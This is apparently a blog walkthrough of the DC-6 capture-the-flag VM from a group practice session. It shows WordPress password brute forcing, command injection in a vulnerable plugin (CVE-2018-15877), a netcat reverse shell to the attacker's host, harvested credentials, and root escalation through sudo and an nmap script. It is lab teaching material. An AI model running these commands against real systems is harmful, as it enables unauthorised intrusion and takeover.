Home

DC919 CTF night w/"DC-6"

DC919 CTF exercise night using "DC-6" prebuilt VM image

SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.

Credits

The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out smarter.

Setup

• VirtualBox with a Host-Only network, DHCP server enabled using address range 192.168.57.0/24
• Kali Linux VM in VirtualBox setup with 2 NICs: 1 Bridged to your LAN or NAT, 1 Host-Only
• DC-6 target VM in VirtualBox setup with 1 NIC: attached to Host-Only network, above.
• Be sure you can login to Kali and identify/ping your target VM.
• We have no credentials for the target at this time, and must discover them.
• Original DC-6 setup doc requires adding a /etc/hosts entry named "wordy" in your Kali VM pointing to the target VM IP.

In this case the VMs have the following IPs:

• Kali: 192.168.57.254
• DC6: 192.168.57.3

Process

Info gathered 192.168.57.3: nmap finds 22,80, browser shows a wordpress site

'wpscan' shows site is running latest wordpress with vulnerable plugins

used 'wpscan' to brute force users, enumerate vulnerable plugins:

• wpscan crashes because cmsscanner has a bug with single-word domains ('wordy' in our case), "gem update cms_scanner" to fix for now.
• wpscan passive plugin scan doesn't find anything valuable, but "--plugins-detection aggressive" does.

• shortened wordlist derived from VM creator hint to save lots of time:

  zgrep k01 /usr/share/wordlists/rockyou.txt.gz >dc6pass.txt

• enumerate wordpress users and brute force passwords:

  wpscan --url http://wordy/ -P dc6pass.txt

  Found wordpress user/pass: mark/helpdesk01

• aggresive plugin scan finds a few CVEs of note, but one stands out:

  vulnerable plainview_activity_monitor plugin: https://github.com/aas-n/CVE/tree/master/CVE-2018-15877

Exploit vulnerable plugin

Used CVE-2018-15877 PoC example with Firefox builtin dev tools and 'edit/resend' from network tab to confirm vulnerability, run commands, get reverse shell:

With Firefox open, login to wordpress site with newly found credentials, then manually edit URL to get to vulnerable page: http://wordy/wp-admin/admin.php?page=plainviewactivitymonitor&tab=activity_tools

This should show a text box and the relevant form submit button: "Lookup". This vulnerability relies on a lack of input validation/sanitization, and apparently supplies whatever we put in this text box directly to a command line utility on the system ('dig'). However, we can't just do what we want in the text box because there are constraints: the biggest is that the text box limits length, and the exploit requires a hostname that resolves. If you supply a bad parameter, the underlying utility exits with an error code and won't run your commands.

The easiest proof of concept for this exploit that I found is to type this into the text box and hit the Lookup button:

b.ca|id

If all is well, you should see the output of the id command, indicating you've got www-data system permissions.

To get any farther, we'll have to use a more advanced method. Specialized tools like burpsuite will make quick work of these next steps if you know what you're doing with them. But Firefox has builtin development tools that will do the job, and that's what is used here:

With the vulnerable target page open in Firefox, open the Development Tools (hit F12) and head to the Network tab.

Run the same b.ca|id Lookup with the Network tab open and you'll see a POST request show up at the top of the list. Select it and explore the contents of tabs on the right. When done exploring, right click on the POST request in the left pane again and click Edit and Resend. You'll get some text boxes on the right, find the Request Body and change id to cat /etc/passwd, then click Send. This probably won't change the original page view in the browser, but if you click on the new POST request and head to the Response tab, you should see both a rendered version including /etc/passwd, as well as the payload at the bottom. If this worked, its time to move on to getting a reverse shell.

Get a reverse shell

To get a reverse shell, we'll use some tricks like the ones found here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.

First, on our Kali VM, run this in a new terminal:

nc -v -l -p 8080

Using our Edit and Resend method in Firefox from above, send the following to the vulnerable target form (192.168.57.254 is our Kali VM IP):

b.ca|nc -e /bin/sh 192.168.57.254 8080

If that worked, you should see in your Kali VM terminal something like this:

systat@kali:~$ nc -v -l -p 8080
listening on [any] 8080 ...
connect to [192.168.57.254] from wordy [192.168.57.3] 34348

Try running a command or two, but be careful what you send, this is a fragile shell with no prompt, no terminal handling, etc:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uptime
 17:36:04 up  1:17,  1 user,  load average: 0.00, 0.00, 0.15

Once a reverse shell is obtained, use the following to get access to stderr to make recon easier:

exec 2>&1

Filesystem recon

Filesystem recon showed database credentials in /var/www/html/wp-config.php: wpdbuser/meErKatZ (wordpressdb)

Filesystem recon showed writable backup.sh in /home/jens/backup.sh

Filesystem recon showed plaintext credentials for 'graham' user in /home/mark/stuff/things-to-do.txt: graham / GSo7isUM1D4

With 'graham' user credentials found, we are able to progress from our hacky reverse shell to a proper ssh session, so do that and move on..

Further exploration

As 'graham', we should check what we're able to do with sudo:

  graham@dc-6:/home/jens$ sudo -l
  Matching Defaults entries for graham on dc-6:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  
  User graham may run the following commands on dc-6:
      (jens) NOPASSWD: /home/jens/backups.sh

Using this (and the fact that backups.sh is writable by graham), modify backups.sh to sudo -l >/tmp/f.txt and run sudo -u jens /home/jens/backups.sh which unveils this gem in /tmp/f.txt:

  Matching Defaults entries for jens on dc-6:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  
  User jens may run the following commands on dc-6:
      (root) NOPASSWD: /usr/bin/nmap

Privilege escalation (sudo-as-root access)

Modify backup.sh again, replacing contents with this:

  #!/bin/sh
  exec /bin/sh

Running sudo -u jens /home/jens/backups.sh same as before gets a shell as 'jens', knowing that this user can run nmap as root with no password.

Privilege escalation (to root)

Armed with some prior knowledge that nmap will run lua scripts, ran this:

$ echo "os.execute('/bin/sh')" >shell.nse && sudo nmap --script=./shell.nse 

Starting Nmap 7.40 ( https://nmap.org ) at 2019-06-15 14:08 AEST
# id
uid=0(root) gid=0(root) groups=0(root)

Bonus: run "stty sane" to fix the local echo in the root shell.

# cat /root/theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Other Links

• https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
• https://serverfault.com/questions/130946/is-it-dangerous-to-allow-every-user-to-run-nmap-as-root
• https://www.andreafortuna.org/2018/05/16/exploiting-sudo-for-linux-privilege-escalation/
• https://www.exploit-db.com/exploits/45274

mtime: 2019-06-14

© 2019 systat | Powered by OpenBSD | Built with ssg3